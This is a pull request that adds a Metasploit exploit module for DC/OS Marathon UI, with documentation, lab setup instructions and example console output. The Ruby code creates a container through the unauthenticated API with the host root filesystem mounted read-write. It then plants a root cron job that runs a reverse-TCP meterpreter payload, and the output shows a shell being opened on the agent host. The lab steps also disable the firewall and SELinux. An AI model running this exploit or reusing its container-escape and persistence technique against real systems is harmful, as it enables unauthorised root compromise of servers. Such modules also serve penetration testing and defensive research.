### PR TITLE
DC/OS Marathon UI Exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/dcos_marathon.md
+++ b/documentation/modules/exploit/linux/http/dcos_marathon.md
@@ -73,11 +73,12 @@ rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later
 
 Shut down the CentOS vm, take a snapshot. (This will be your base)
 clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent.
-Start both virtual machines. Login and get their current IP address.
-I recommend giving them static IPs if you have further use for the cluster.
+Start the DCOS-Master and DCOS-Agent virtual machines You just cloned.
+Login and get their current IP address.
+* Note: I recommend giving them static IPs if you have further use for the cluster.
 
 From here use another linux machine with docker installed to finish
-the installation process. I used a ubuntu machine with docker installed.
+the installation process. I used an ubuntu machine with docker installed.
 
 Follow the custom CLI guide for creating the required files in 
 the genconf folder.
@@ -132,18 +133,16 @@ sudo ./dcos_generate_config.sh --deploy
 sudo bash dcos_generate_config.sh --postflight
 ```
 
-If all is passing navigate to http://<master_ip>:8080/
+If all is passing navigate to http://[master_ip]:8080/
 You should see the Marathon UI web application.
 
 # Exploitation
-This module is designed for attacker to leaverage the creatation of a
+This module is designed for the attacker to leaverage the creatation of a
 docker contianer with out authentication through the DCOS Marathon UI
 to gain root access to the hosting server of the docker container 
 in the DCOS cluster.
 
 ## Options
-- RHOST is the target IP/Hostname that is hosting the Marathon UI Web application
-- RPORT is the Port the Marathon UI service is running on.
 - DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit.
 - TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps
 - WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.

--- a/documentation/modules/exploit/linux/http/dcos_marathon.md
+++ b/documentation/modules/exploit/linux/http/dcos_marathon.md
@@ -1,0 +1,193 @@
+# Vulnerable Application
+Utilizing the DCOS Cluster's Marathon UI, an attacker can create
+a docker container with the '/' path mounted with read/write
+permissions on the host server that is running the docker container.
+As the docker container excutes command as uid 0 it is honored
+by the host operating system allowing the attacker to edit/create
+files owed by root. This exploit abuses this to creates a cron job
+in the '/etc/cron.d/' path of the host server.
+
+*Notes: The docker image must be a valid docker image from 
+hub.docker.com. Further more the docker container will only
+deploy if there are resources available in the DC/OS
+
+## DCOS
+This Expoit was tested with CentOS 7 as the host operating system for
+the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with
+Defualt 'custom' installation for on site premise setup. Only the Install
+part of the DCOS guide was completed, the system hardening and securing
+your cluster section where skipped. This is to represent a 'Defualt' install
+with a system admin conducting hasty deployments taking no thought about security.
+
+
+## To Setup Your Cluster
+I recommend doing a 'On-Premies'/custom
+cluster. https://dcos.io/docs/1.8/administration/installing/custom/
+Create a virtual CentOS machine, install requirements base on the above
+guide.
+ 
+```bash
+# The TLDR from the above guide
+sudo systemctl stop firewalld && sudo systemctl disable firewalld
+sudo yum install -y tar xz unzip curl ipset ntp
+systemctl start ntpd
+systemctl enable ntpd
+sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \
+   sudo groupadd nogroup && sudo reboot
+```
+
+Install a supported version of docker on the CentOS systems
+https://dcos.io/docs/1.8/administration/installing/custom/system-requirements/install-docker-centos/
+
+```bash
+# The TLDR of the above guide
+sudo yum -y remove docker docker-common container-selinux
+sudo yum -y remove docker-selinux
+sudo yum install -y yum-utils
+sudo yum-config-manager \
+   --add-repo \
+   https://docs.docker.com/engine/installation/linux/repo_files/centos/docker.repo
+sudo yum-config-manager --enable docker-testing
+sudo yum makecache fast
+sudo yum -y install docker-engine-1.11.2
+sudo systemctl start docker
+sudo systemctl enable docker
+sudo echo overlay > /etc/modules-load.d/overlay.conf
+sudo reboot
+```
+
+Once the CentOS machine has rebooted, edit the systemctl
+service file for docker and change the ExecStart- line to
+`ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://`
+restart the docker service and verify it is running.
+lastely generate ssh rsa keys for authentication. And update the 
+/etc/ssh/sshd_config file to support root login.
+
+```bash
+ssh-keygen -t rsa -b 4096
+# Press enter until complete, DO NOT PUT A PASSWORD.
+cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys
+cat ~/.ssh/id_rsa # save the output you will need it for later
+rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later
+```
+
+Shut down the CentOS vm, take a snapshot. (This will be your base)
+clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent.
+Start both virtual machines. Login and get their current IP address.
+I recommend giving them static IPs if you have further use for the cluster.
+
+From here use another linux machine with docker installed to finish
+the installation process. I used a ubuntu machine with docker installed.
+
+Follow the custom CLI guide for creating the required files in 
+the genconf folder.
+https://dcos.io/docs/1.8/administration/installing/custom/cli/
+
+Example genconf/config.yaml
+```
+---
+agent_list:
+- 192.168.0.10
+bootstrap_url: file:///opt/dcos_install_tmp
+cluster_name: DCOS
+exhibitor_storage_backend: static
+ip_detect_filename: /genconf/ip-detect
+master_discovery: static
+master_list:
+- 192.168.0.9
+process_timeout: 10000
+resolvers:
+- 8.8.8.8
+- 8.8.4.4
+ssh_port: 22
+ssh_user: root
+```
+Example genconf/ip-detect
+```bash
+#!/usr/bin/env bash
+set -o nounset -o errexit
+export PATH=/usr/sbin:/usr/bin:$PATH
+ip=$(ip addr show ens33)
+echo $( echo $ip | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1)
+```
+
+place your id_rsa ssh key into the genconf file and rename the
+file to ssh_key and `chmod 0600 genconf/ssh_key`
+
+Deploying the cluster
+in the folder containing the genconf folder do the following.
+NOTE: if following the cli install from DCOS itself, it will fail
+if you do --install-prereqs. It will install an unsupported version of
+docker.
+
+```bash
+curl -O https://downloads.dcos.io/dcos/stable/dcos_generate_config.sh
+chmod +x dcos_generate_config.sh
+sudo ./dcos_generate_config.sh --genconf
+sudo ./dcos_generate_config.sh --preflight
+# If all preflight checks pass
+sudo ./dcos_generate_config.sh --deploy
+# get a cup of coffie
+# wait a minute or two after deploy completes
+sudo bash dcos_generate_config.sh --postflight
+```
+
+If all is passing navigate to http://<master_ip>:8080/
+You should see the Marathon UI web application.
+
+# Exploitation
+This module is designed for attacker to leaverage the creatation of a
+docker contianer with out authentication through the DCOS Marathon UI
+to gain root access to the hosting server of the docker container 
+in the DCOS cluster.
+
+## Options
+- RHOST is the target IP/Hostname that is hosting the Marathon UI Web application
+- RPORT is the Port the Marathon UI service is running on.
+- DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit.
+- TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps
+- WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.
+- CONTAINER_ID is optional if you want to have your container docker have a human readable name else it will be randomly generated
+
+## Steps to exploit with module
+- [ ] Start msfconsole
+- [ ] use exploit/linux/http/dcos_marathon
+- [ ] Set the options appropriately and set VERBOSE to true
+- [ ] Verify it creates a docker container and it successfully runs
+- [ ] After a minute a session should be opened from the agent server
+
+## Example Output
+```
+msf > use exploit/linux/http/dcos_marathon 
+msf exploit(dcos_marathon) > set RHOST 192.168.0.9
+RHOST => 192.168.0.9
+msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp
+payload => python/meterpreter/reverse_tcp
+msf exploit(dcos_marathon) > set LHOST 192.168.0.100
+LHOST => 192.168.0.100
+msf exploit(dcos_marathon) > set verbose true
+verbose => true
+msf exploit(dcos_marathon) > check
+[*] 192.168.0.9:8080 The target appears to be vulnerable.
+msf exploit(dcos_marathon) > exploit 
+
+[*] Started reverse TCP handler on 192.168.0.100:4444 
+[*] Setting container json request variables
+[*] Creating the docker container command
+[*] The docker container is created, waiting for it to deploy
+[*] Waiting up to 60 seconds for docker container to start
+[*] The docker container is running, removing it
+[*] Waiting for the cron job to run, can take up to 60 seconds
+[*] Sending stage (39690 bytes) to 192.168.0.10
+[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.10:54468) at 2017-03-01 14:22:02 -0500
+[+] Deleted /etc/cron.d/FOWkTeZL
+[+] Deleted /tmp/TIWpOfUR
+
+meterpreter > sysinfo
+Computer        : localhost.localdomain
+OS              : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UTC 2016
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```

--- a/documentation/modules/exploit/linux/http/dcos_marathon.md
+++ b/documentation/modules/exploit/linux/http/dcos_marathon.md
@@ -2,36 +2,36 @@
 Utilizing the DCOS Cluster's Marathon UI, an attacker can create
 a docker container with the '/' path mounted with read/write
 permissions on the host server that is running the docker container.
-As the docker container excutes command as uid 0 it is honored
+As the docker container executes command as uid 0 it is honored
 by the host operating system allowing the attacker to edit/create
 files owed by root. This exploit abuses this to creates a cron job
 in the '/etc/cron.d/' path of the host server.
 
-*Notes: The docker image must be a valid docker image from 
+*Notes: The docker image must be a valid docker image from
 hub.docker.com. Further more the docker container will only
 deploy if there are resources available in the DC/OS
 
 ## DCOS
-This Expoit was tested with CentOS 7 as the host operating system for
+This Exploit was tested with CentOS 7 as the host operating system for
 the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with
-Defualt 'custom' installation for on site premise setup. Only the Install
+Default 'custom' installation for on site premise setup. Only the Install
 part of the DCOS guide was completed, the system hardening and securing
-your cluster section where skipped. This is to represent a 'Defualt' install
+your cluster section where skipped. This is to represent a 'Default' install
 with a system admin conducting hasty deployments taking no thought about security.
 
 
 ## To Setup Your Cluster
-I recommend doing a 'On-Premies'/custom
+I recommend doing a 'on-premise'/custom
 cluster. https://dcos.io/docs/1.8/administration/installing/custom/
 Create a virtual CentOS machine, install requirements base on the above
 guide.
- 
+
 ```bash
 # The TLDR from the above guide
 sudo systemctl stop firewalld && sudo systemctl disable firewalld
 sudo yum install -y tar xz unzip curl ipset ntp
-systemctl start ntpd
-systemctl enable ntpd
+sudo systemctl start ntpd
+sudo systemctl enable ntpd
 sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \
    sudo groupadd nogroup && sudo reboot
 ```
@@ -60,7 +60,7 @@ Once the CentOS machine has rebooted, edit the systemctl
 service file for docker and change the ExecStart- line to
 `ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://`
 restart the docker service and verify it is running.
-lastely generate ssh rsa keys for authentication. And update the 
+lastly generate ssh rsa keys for authentication. And update the
 /etc/ssh/sshd_config file to support root login.
 
 ```bash
@@ -77,10 +77,10 @@ Start the DCOS-Master and DCOS-Agent virtual machines You just cloned.
 Login and get their current IP address.
 * Note: I recommend giving them static IPs if you have further use for the cluster.
 
-From here use another linux machine with docker installed to finish
-the installation process. I used an ubuntu machine with docker installed.
+From here use another Linux machine with docker installed to finish
+the installation process. I used an Ubuntu machine with docker installed.
 
-Follow the custom CLI guide for creating the required files in 
+Follow the custom CLI guide for creating the required files in
 the genconf folder.
 https://dcos.io/docs/1.8/administration/installing/custom/cli/
 
@@ -137,9 +137,9 @@ If all is passing navigate to http://[master_ip]:8080/
 You should see the Marathon UI web application.
 
 # Exploitation
-This module is designed for the attacker to leaverage the creatation of a
-docker contianer with out authentication through the DCOS Marathon UI
-to gain root access to the hosting server of the docker container 
+This module is designed for the attacker to leverage, creation of a
+docker container with out authentication through the DCOS Marathon UI
+to gain root access to the hosting server of the docker container
 in the DCOS cluster.
 
 ## Options
@@ -157,7 +157,7 @@ in the DCOS cluster.
 
 ## Example Output
 ```
-msf > use exploit/linux/http/dcos_marathon 
+msf > use exploit/linux/http/dcos_marathon
 msf exploit(dcos_marathon) > set RHOST 192.168.0.9
 RHOST => 192.168.0.9
 msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp
@@ -168,9 +168,9 @@ msf exploit(dcos_marathon) > set verbose true
 verbose => true
 msf exploit(dcos_marathon) > check
 [*] 192.168.0.9:8080 The target appears to be vulnerable.
-msf exploit(dcos_marathon) > exploit 
+msf exploit(dcos_marathon) > exploit
 
-[*] Started reverse TCP handler on 192.168.0.100:4444 
+[*] Started reverse TCP handler on 192.168.0.100:4444
 [*] Setting container json request variables
 [*] Creating the docker container command
 [*] The docker container is created, waiting for it to deploy
@@ -188,5 +188,5 @@ OS              : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UT
 Architecture    : x64
 System Language : en_US
 Meterpreter     : python/linux
-meterpreter > 
+meterpreter >
 ```

--- a/modules/exploits/linux/http/dcos_marathon.rb
+++ b/modules/exploits/linux/http/dcos_marathon.rb
@@ -1,0 +1,201 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DC/OS Marathon UI Docker Exploit',
+      'Description'    => %q{
+        Utilizing the DCOS Cluster's Marathon UI, an attacker can create
+        a docker container with the '/' path mounted with read/write
+        permissions on the host server that is running the docker container.
+        As the docker container excutes command as uid 0 it is honored
+        by the host operating system allowing the attacker to edit/create
+        files owed by root. This exploit abuses this to creates a cron job
+        in the '/etc/cron.d/' path of the host server.
+        
+        *Notes: The docker image must be a valid docker image from 
+        hub.docker.com. Further more the docker container will only
+        deploy if there are resources available in the DC/OS cluster.
+      },
+      'Author'         => 'Erik Daguerre',
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
+      ],
+      'Payload'        =>
+        {
+          'DisableNops'=> true,
+        },
+      'Targets'            => [
+        [ 'Python', {
+            'Platform'   => 'python',
+            'Arch'       => ARCH_PYTHON,
+            'Payload'    => {
+              'Compat'   => {
+                'ConnectionType' => 'reverse noconn none tunnel'
+              }
+            }
+          }
+        ]
+      ],
+      'DefaultOptions' => { 'WfsDelay' => 75 },
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 03, 2017'))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
+        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
+        OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
+        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wiat for the docker container to deploy', 60 ])
+      ], self.class)
+  end
+
+  def get_apps
+    res = send_request_raw({
+      'method'  => 'GET',
+      'uri'     => target_uri.path
+    })
+    return unless res and res.code == 200
+
+    # verify it is marathon ui, and is returning content-type json
+    return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
+    apps = JSON.parse(res.body)
+
+    apps
+  end
+
+  def del_container(container_id)
+    res = send_request_raw({
+      'method'  => 'DELETE',
+      'uri'     => normalize_uri(target_uri.path, container_id)
+    })
+    return unless res and res.code == 200
+
+    res.code
+  end
+
+  def make_container_id
+    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
+  
+    rand_text_alpha_lower(8)
+  end
+
+  def make_cmd(mnt_path, cron_path, payload_path)
+    vprint_status('Creating the docker container command')
+    payload_data = nil
+    echo_cron_path = mnt_path + cron_path
+    echo_payload_path = mnt_path + payload_path
+
+    cron_command = "python #{payload_path}"
+    payload_data = payload.raw
+
+    command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
+    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
+    command << "echo \"\" >> #{echo_cron_path}\n"
+    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
+    command << "sleep 120"
+
+    command
+  end
+
+  def make_container(mnt_path, cron_path, payload_path, container_id)
+    vprint_status('Setting container json request variables')
+    container_data = {
+      'cmd'                 => make_cmd(mnt_path, cron_path, payload_path),
+      'cpus'                => 1,
+      'mem'                 => 128,
+      'disk'                => 0,
+      'instances'           => 1,
+      'id'                  => container_id,
+      'container'           => {
+        'docker'            => {
+          'image'           => datastore['DOCKERIMAGE'],
+          'network'         => 'HOST',
+        },
+        'type'              => 'DOCKER',
+        'volumes'           => [
+          {
+            'hostPath'      => '/',
+            'containerPath' => mnt_path,
+            'mode'          => 'RW'
+          }
+        ],
+      },
+      'env'                 => {},
+      'labels'              => {}
+    }
+
+    container_data
+  end
+
+  def check
+    return Exploit::CheckCode::Safe if get_apps.nil?
+
+    Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    if get_apps.nil?
+      fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
+    end
+    # create required information to create json container information.
+    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
+    payload_path = '/tmp/' + rand_text_alpha(8)
+    mnt_path = '/mnt/' + rand_text_alpha(8)
+    container_id = make_container_id()
+
+    res = send_request_raw({
+      'method'  => 'POST',
+      'uri'     => target_uri.path,
+      'data'    => make_container(mnt_path, cron_path, payload_path, container_id).to_json
+    })
+    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201
+
+    print_status('The docker container is created, waiting for it to deploy')
+    register_files_for_cleanup(cron_path, payload_path)
+    sleep_time = 5
+    wait_time = datastore['WAIT_TIMEOUT']
+    deleted_container = false
+    print_status("Waiting up to #{wait_time} seconds for docker container to start")
+    
+    while wait_time > 0
+      sleep(sleep_time)
+      wait_time -= sleep_time
+      apps_status = get_apps
+      fail_with(Failure::Unkown, 'No apps returned') unless apps_status
+      
+      apps_status['apps'].each do |app|
+        next if app['id'] != "/#{container_id}"
+      
+        if app['tasksRunning'] == 1
+          print_status('The docker container is running, removing it')
+          del_container(container_id)
+          deleted_container = true
+          wait_time = 0
+        else
+          vprint_status('The docker container is not yet running')
+        end
+        break
+      end
+    end
+    
+    # If the docker container does not deploy remove it and fail out.
+    unless deleted_container
+      del_container(container_id)
+      fail_with(Failure::Unknown, "The docker container failed to start")
+    end
+    print_status('Waiting for the cron job to run, can take up to 60 seconds')
+  end
+end

--- a/modules/exploits/linux/http/dcos_marathon.rb
+++ b/modules/exploits/linux/http/dcos_marathon.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
         by the host operating system allowing the attacker to edit/create
         files owed by root. This exploit abuses this to creates a cron job
         in the '/etc/cron.d/' path of the host server.
-        
+
         *Notes: The docker image must be a valid docker image from 
         hub.docker.com. Further more the docker container will only
         deploy if there are resources available in the DC/OS cluster.
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def make_container_id
     return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
-  
+
     rand_text_alpha_lower(8)
   end
 
@@ -169,16 +169,16 @@ class MetasploitModule < Msf::Exploit::Remote
     wait_time = datastore['WAIT_TIMEOUT']
     deleted_container = false
     print_status("Waiting up to #{wait_time} seconds for docker container to start")
-    
+
     while wait_time > 0
       sleep(sleep_time)
       wait_time -= sleep_time
       apps_status = get_apps
-      fail_with(Failure::Unkown, 'No apps returned') unless apps_status
-      
+      fail_with(Failure::Unknown, 'No apps returned') unless apps_status
+
       apps_status['apps'].each do |app|
         next if app['id'] != "/#{container_id}"
-      
+
         if app['tasksRunning'] == 1
           print_status('The docker container is running, removing it')
           del_container(container_id)
@@ -190,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
         break
       end
     end
-    
+
     # If the docker container does not deploy remove it and fail out.
     unless deleted_container
       del_container(container_id)

--- a/modules/exploits/linux/http/dcos_marathon.rb
+++ b/modules/exploits/linux/http/dcos_marathon.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
         files owed by root. This exploit abuses this to creates a cron job
         in the '/etc/cron.d/' path of the host server.
 
-        *Notes: The docker image must be a valid docker image from 
+        *Notes: The docker image must be a valid docker image from
         hub.docker.com. Further more the docker container will only
         deploy if there are resources available in the DC/OS cluster.
       },

--- a/modules/exploits/linux/http/dcos_marathon.rb
+++ b/modules/exploits/linux/http/dcos_marathon.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
         OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
         OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
-      ], self.class)
+      ])
   end
 
   def get_apps

--- a/modules/exploits/linux/http/dcos_marathon.rb
+++ b/modules/exploits/linux/http/dcos_marathon.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -18,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         Utilizing the DCOS Cluster's Marathon UI, an attacker can create
         a docker container with the '/' path mounted with read/write
         permissions on the host server that is running the docker container.
-        As the docker container excutes command as uid 0 it is honored
+        As the docker container executes command as uid 0 it is honored
         by the host operating system allowing the attacker to edit/create
         files owed by root. This exploit abuses this to creates a cron job
         in the '/etc/cron.d/' path of the host server.
@@ -32,10 +30,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     => [
         [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
       ],
-      'Payload'        =>
-        {
-          'DisableNops'=> true,
-        },
       'Targets'            => [
         [ 'Python', {
             'Platform'   => 'python',
@@ -58,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
         OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
         OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
-        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wiat for the docker container to deploy', 60 ])
+        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
       ], self.class)
   end
 


### PR DESCRIPTION
This PR adds an exploit module that that abuses the features
of the DC/OS Marathon UI when creating a docker container.

Utilizing the DCOS Cluster's Marathon UI, an attacker can create
a docker container with the '/' path mounted with read/write
permissions on the host server that is running the docker container.
As the docker container excutes command as uid 0 it is honored
by the host operating system allowing the attacker to edit/create
files owed by root. This exploit abuses this to creates a cron job
in the '/etc/cron.d/' path of the host server.

*Notes: The docker image must be a valid docker image from 
hub.docker.com. Further more the docker container will only
deploy if there are resources available in the DC/OS cluster.


# Verification

## DCOS Setup

Install a DCOS cluster. I recommend doing a 'On-Premises'/custom
cluster. https://dcos.io/docs/1.8/administration/installing/custom/
Create a virtual CentOS machine, install requirements base on the above
guide.
 
```bash
# The TLDR from the above guide
sudo systemctl stop firewalld && sudo systemctl disable firewalld
sudo yum install -y tar xz unzip curl ipset ntp
sudo systemctl start ntpd
sudo systemctl enable ntpd
sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \
   sudo groupadd nogroup && sudo reboot
```

Install a supported version of docker on the CentOS systems
https://dcos.io/docs/1.8/administration/installing/custom/system-requirements/install-docker-centos/

```bash
# The TLDR of the above guide
sudo yum -y remove docker docker-common container-selinux
sudo yum -y remove docker-selinux
sudo yum install -y yum-utils
sudo yum-config-manager \
   --add-repo \
   https://docs.docker.com/engine/installation/linux/repo_files/centos/docker.repo
sudo yum-config-manager --enable docker-testing
sudo yum makecache fast
sudo yum -y install docker-engine-1.11.2
sudo systemctl start docker
sudo systemctl enable docker
echo overlay | sudo tee /etc/modules-load.d/overlay.conf
sudo reboot
```

Once the CentOS machine has rebooted, edit the systemctl
service file for docker and change the ExecStart- line to
`ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://`
restart the docker service and verify it is running.
lastely generate ssh rsa keys for authentication. And update the 
/etc/ssh/sshd_config file to support root login.

```bash
ssh-keygen -t rsa -b 4096
# Press enter until complete, DO NOT PUT A PASSWORD.
cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys
cat ~/.ssh/id_rsa # save the output you will need it for later
rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later
```

Shut down the CentOS vm, take a snapshot. (This will be your base)
clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent.
Start The DCOS-Master and DCOS-Agent virtual machines. Login and get their current IP address.
I recommend giving them static IPs if you have further use for the cluster.

From here use another linux machine with docker installed to finish
the installation process. I used a ubuntu machine with docker installed.

Follow the custom CLI guide for creating the required files in 
the genconf folder.
https://dcos.io/docs/1.8/administration/installing/custom/cli/

Example genconf/config.yaml
```
---
agent_list:
- 192.168.0.10
bootstrap_url: file:///opt/dcos_install_tmp
cluster_name: DCOS
exhibitor_storage_backend: static
ip_detect_filename: /genconf/ip-detect
master_discovery: static
master_list:
- 192.168.0.9
process_timeout: 10000
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
ssh_user: root
```
Example genconf/ip-detect
```bash
#!/usr/bin/env bash
set -o nounset -o errexit
export PATH=/usr/sbin:/usr/bin:$PATH
ip=$(ip addr show ens33)
echo $( echo $ip | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1)
```
place your id_rsa ssh key into the genconf file and rename the
file to ssh_key and `chmod 0600 genconf/ssh_key`

Deploying the cluster
in the folder containing the genconf folder do the following.
NOTE: if following the cli install from DCOS itself, it will fail
if you do --install-prereqs. It will install an unsupported version of
docker.
```bash
curl -O https://downloads.dcos.io/dcos/stable/dcos_generate_config.sh
chmod +x dcos_generate_config.sh
sudo ./dcos_generate_config.sh --genconf
sudo ./dcos_generate_config.sh --preflight
# If all preflight checks pass
sudo ./dcos_generate_config.sh --deploy
# get a cup of coffie
# wait a minute or two after deploy completes
sudo bash dcos_generate_config.sh --postflight
```
If all is passing navigate to http://<master_ip>:8080/
You should see the Marathon UI web application.

## Exploitation

- [ ] Start msfconsole
- [ ] use exploit/linux/http/dcos_marathon
- [ ] Set the options appropriately and set VERBOSE to true
- [ ] Verify it creates a docker container and it successfully runs
- [ ] After a minute a session should be opened from the agent server

## Example Output
```
msf > use exploit/linux/http/dcos_marathon 
msf exploit(dcos_marathon) > set RHOST 192.168.0.9
RHOST => 192.168.0.9
msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(dcos_marathon) > set LHOST 192.168.0.100
LHOST => 192.168.0.100
msf exploit(dcos_marathon) > set verbose true
verbose => true
msf exploit(dcos_marathon) > check
[*] 192.168.0.9:8080 The target appears to be vulnerable.
msf exploit(dcos_marathon) > exploit 

[*] Started reverse TCP handler on 192.168.0.100:4444 
[*] Setting container json request variables
[*] Creating the docker container command
[*] The docker container is created, waiting for it to deploy
[*] Waiting up to 60 seconds for docker container to start
[*] The docker container is running, removing it
[*] Waiting for the cron job to run, can take up to 60 seconds
[*] Sending stage (39690 bytes) to 192.168.0.10
[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.10:54468) at 2017-03-01 14:22:02 -0500
[+] Deleted /etc/cron.d/FOWkTeZL
[+] Deleted /tmp/TIWpOfUR

meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UTC 2016
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > 
```